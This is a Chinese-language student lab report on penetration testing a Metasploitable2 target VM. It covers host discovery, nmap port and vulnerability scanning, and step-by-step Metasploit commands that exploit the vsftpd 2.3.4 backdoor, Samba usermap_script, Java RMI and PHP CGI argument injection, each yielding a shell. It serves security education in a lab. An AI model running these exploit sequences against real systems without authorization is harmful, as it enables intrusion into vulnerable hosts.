1.实验内容
1.1实验要求
掌握metasploit的用法
1.2实验内容
(1)发现Metasploitable2靶机,并对其进行端口扫描、漏洞扫描;
(2)利用Vsftpd源码包后门漏洞;
(3)利用SambaMS-RPC Shell命令注入漏洞;
(4)利用Java RMI SERVER命令执行漏洞;
(5)利用PHP CGI参数执行注入漏洞。
1.3本周学习内容
掌握了metasploit的使用过程以及原理
2.实验过程
前期准备,安装好靶机
2.1前期渗透
(1)主机发现
在Kali中依次输入如下命令。
msfconsole //进入msf控制台
search arp_sweep //搜寻arp_sweep功能模块
use 0 //在查询结果中使用第0项模块(也可以将0换成具体模块名字)
show options //查找该模块目前已填入的参数(同时可以看到需要填写的参数)
查询靶机IP地址,为192.168.78.147
再返回Kali输入如下命令。set RHOSTS 192.168.78.0/24 //设置目标主机IP地址
run //开始扫描
可以看到成功的扫描到了靶机
(2)端口扫描
nmap -p 1-2318 192.168.78.147 //扫描靶机的1-2318端口,可以看到开放的端口
可以看到靶机有很多端口都是处于open状态
(3)漏洞扫描
使用命令nmap -script=vuln 192.168.78.147对靶机进行漏洞扫描。
对扫描结果进行分析,发现靶机中存在相当多漏洞,也可以看到本次实验需要要用到的21、139、1099、80端口的开放信息以及漏洞信息。
通过询问ai我知道对于25端口的SMTP服务存在匿名Diffie-Hellman密钥交换漏洞和DHE_EXPORT降级漏洞。Diffie-Hellman密钥交换漏洞会导致中间人攻击,破坏通信的机密性和完整性。
对于80端口的HTTP服务存在敏感目录与文件暴露风险,Slowloris DoS漏洞和跨站请求伪造漏洞
对于1099端口的远程方法调用服务也存在漏洞,RMI注册表的默认配置允许从远程URL加载类,可导致远程代码执行。
2.2Vsftpd源码包后门漏洞(21端口)
通过学习相关知识点我知道,该漏洞的原理是在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
进入msf控制台,输入如下命令:
use exploit/unix/ftp/vsftpd_234_backdoor //选择漏洞
set RHOST 192.168.78.147 //设置要攻击的机器IP(靶机IP)
exploit/run //开始攻击
再利用uname –a、pwd、id、ifconfig等命令进行验证是否攻击成功
可以看到我们现在已经成功的获取了靶机shell,攻击成功
2.3SambaMS-RPC Shell命令注入漏洞(端口139)
通过学习相关知识点我知道,该漏洞的原理是amba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
输入命令
use exploit/multi/samba/usermap_script //选择漏洞
set RHOST 192.168.78.147 //设置要攻击的机器IP(靶机IP)
exploit/run //开始攻击
再利用ifconfig命令进行验证是否攻击成功,可以看到攻击成功了。
2.4Java RMI SERVER命令执行漏洞(1099端口)
通过学习相关知识点我知道,该漏洞的原理是Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
输入命令
use exploit/multi/misc/java_rmi_server //选择漏洞
set RHOST 192.168.78.147 //设置要攻击的机器IP(靶机IP)
exploit/run //开始攻击
ifconfig //验证攻击是否成功
可以看到成功获得了靶机的shell,攻击成功
2.5PHP CGI参数执行注入漏洞(80端口)
通过学习相关知识点我知道,该漏洞的原理是CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。
输入命令
use exploit/multi/http/php_cgi_arg_injection //选择漏洞
set RHOST 192.168.78.147 //设置要攻击的机器IP(靶机IP)
exploit/run //开始攻击
shell //尝试打开靶机shell
可以看到成功获得了靶机的shell,攻击成功
3.问题及解决方案
- 问题1:在靶机使用ifconfig没有IP地址显示
- 问题1解决方案:通过查询相关教程,将连接方式改为桥接,解决了问题
![image]()
4.学习感悟、思考等
通过本次实验,我学习了Metasploit攻击渗透实践,对Metasploit的流程以及原理都有了更深刻的理解,对主机发现、端口扫描与漏洞扫描的掌握也更加清晰
整体上来说我认为这次实验的难度不大,只有在安装靶机的时候浪费的时间比较多,后面的测试部分的整体思路类似,但是仍需要辨析每一种测试方式的原理
参考资料
- Metasploit安装
)
)